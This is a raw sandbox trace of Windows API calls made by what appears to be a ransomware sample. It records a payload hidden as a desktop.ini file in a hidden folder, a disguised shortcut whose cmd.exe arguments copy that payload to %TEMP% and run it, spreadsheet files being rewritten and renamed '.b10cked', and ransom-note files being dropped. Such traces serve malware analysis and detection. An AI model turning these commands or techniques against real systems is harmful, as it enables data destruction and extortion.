\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xa70, dwThreadId=0xbf0)) returned 1 [0132.497] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0133.135] CloseHandle (hObject=0x114) returned 1 [0133.136] CloseHandle (hObject=0x110) returned 1 [0133.136] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.136] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.136] GetTickCount () returned 0x2a4f5 [0133.136] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18992516470) returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x34\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x55\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0133.136] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"2w7_ew\" & type \"2w7_ew\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5d | out: lpsz="EXPLORER.EXE \"2W7_EW\" & TYPE \"2W7_EW\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5d [0133.136] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"2w7_ew\" & type \"2w7_ew\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5e | out: lpsz="EXPLORER.EXE \"2W7_EW\" & TYPE \"2W7_EW\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5e [0133.136] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0133.136] CoInitialize (pvReserved=0x0) returned 0x0 [0133.137] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0133.138] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0133.138] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0133.138] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"2w7_ew\" & type \"2w7_ew\\desktop.ini\" > \"%TEMP%\\564nuUlV.exe\" && \"%TEMP%\\564nuUlV.exe\"") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0133.140] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0133.140] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew.lnk", fRemember=0) returned 0x0 [0133.147] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0133.147] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0133.147] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0133.147] CoUninitialize () [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex (hMutex=0xf8) returned 1 [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex (hMutex=0xf8) returned 1 [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex (hMutex=0xf8) returned 1 [0133.148] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.148] ReleaseMutex (hMutex=0xf8) returned 1 [0133.148] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18993709646) returned 1 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2d5c [0133.149] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3244 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3244 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.150] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1921, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1921, lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.151] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1921, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1921, lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6433, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1923 [0133.151] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1921, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1921, lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6433, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1923 [0133.151] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1921, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1921, lpOverlapped=0x0) returned 1 [0133.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lim3Lqu-K6HO.xls", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0133.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lim3Lqu-K6HO.xls", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lim3Lqu-K6HO.xls", lpUsedDefaultChar=0x0) returned 16 [0133.155] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3244 [0133.155] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0133.155] CloseHandle (hObject=0x114) returned 1 [0133.156] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS") returned 0x34 [0133.157] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.157] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbbc, dwThreadId=0xa38)) returned 1 [0133.159] CloseHandle (hObject=0x110) returned 1 [0133.159] CloseHandle (hObject=0x114) returned 1 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0133.159] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0133.159] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0133.159] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0133.159] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0133.159] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.159] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.160] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0133.160] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0133.160] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xa3c, dwThreadId=0xa40)) returned 1 [0133.161] CloseHandle (hObject=0x110) returned 1 [0133.161] CloseHandle (hObject=0x114) returned 1 [0133.161] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0xffffffff [0133.162] GetLastError () returned 0x2 [0133.162] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0133.164] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0133.164] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.164] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.164] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.164] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, 